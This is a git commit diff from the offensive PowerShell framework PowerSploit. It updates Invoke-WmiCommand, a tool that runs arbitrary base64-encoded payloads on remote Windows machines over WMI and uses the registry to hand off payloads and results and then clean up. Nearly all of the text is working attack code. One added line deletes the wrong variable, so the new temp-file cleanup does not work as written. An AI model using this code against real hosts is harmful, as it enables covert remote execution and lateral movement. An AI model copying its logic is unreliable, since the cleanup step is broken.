diff options
| author | Matt Graeber <mattgraeber@gmail.com> | 2015-12-15 11:55:47 -0800 |
|---|---|---|
| committer | Matt Graeber <mattgraeber@gmail.com> | 2015-12-15 11:55:47 -0800 |
| commit | f70c63f9d53167299404db582bc0a8acc96a661b (patch) | |
| tree | 83c9da818fe705bec7330147e1c002184701f4b2 | |
| parent | f6e032c3b14dd6433587c50a4fafcb43e5e18413 (diff) | |
| download | PowerSploit-f70c63f9d53167299404db582bc0a8acc96a661b.tar.gz PowerSploit-f70c63f9d53167299404db582bc0a8acc96a661b.zip | |
Invoke-WmiCommand is now PSv2 compatible
This bug fix addresses issue #96. As much as a hate dropping files to
disk, this was the easiest way to preserve objects in PSv2+. If someone
want to implement the [de]serialization themselves and keep everything
in memory, please submit a PR.
| -rw-r--r-- | CodeExecution/Invoke-WmiCommand.ps1 | 25 |
1 files changed, 19 insertions, 6 deletions
diff --git a/CodeExecution/Invoke-WmiCommand.ps1 b/CodeExecution/Invoke-WmiCommand.ps1 index 7d2bb17..80bed86 100644 --- a/CodeExecution/Invoke-WmiCommand.ps1 +++ b/CodeExecution/Invoke-WmiCommand.ps1 @@ -265,7 +265,7 @@ the output of your payload back. :P } $PowerShellPath = $Result.sValue - Write-Verbose "Full PowerShell path: $PowerShellPath" + Write-Verbose "[$Computer] Full PowerShell path: $PowerShellPath" $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload)) @@ -296,11 +296,18 @@ the output of your payload back. :P if (($Result.ReturnValue -eq 0) -and ($Result.sValue)) { $Payload = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Result.sValue)) - $SerilizedPayloadResult = Invoke-Expression ($Payload) | % { - [Management.Automation.PSSerializer]::Serialize($_, 4) - } + $TempSerializedResultPath = [IO.Path]::GetTempFileName() + + $PayloadResult = Invoke-Expression ($Payload) + + Export-Clixml -InputObject $PayloadResult -Path $TempSerializedResultPath + + $SerilizedPayloadText = [IO.File]::ReadAllText($TempSerializedResultPath) + + $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadText, $RegistryResultValueName + + Remove-Item -Path $SerilizedPayloadResult -Force - $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadResult, $RegistryResultValueName $null = Invoke-WmiMethod @WmiMethodArgs -Name 'DeleteValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryPayloadValueName } } @@ -329,7 +336,13 @@ the output of your payload back. :P Write-Verbose "[$Computer] Payload results successfully retrieved from: $RegistryHive\$RegistryKeyPath\$RegistryResultValueName" $SerilizedPayloadResult = $Result.sValue - $PayloadResult = [Management.Automation.PSSerializer]::Deserialize($SerilizedPayloadResult) + + $TempSerializedResultPath = [IO.Path]::GetTempFileName() + + Out-File -InputObject $SerilizedPayloadResult -FilePath $TempSerializedResultPath + $PayloadResult = Import-Clixml -Path $TempSerializedResultPath + + Remove-Item -Path $TempSerializedResultPath $FinalResult = New-Object PSObject -Property @{ PSComputerName = $Computer |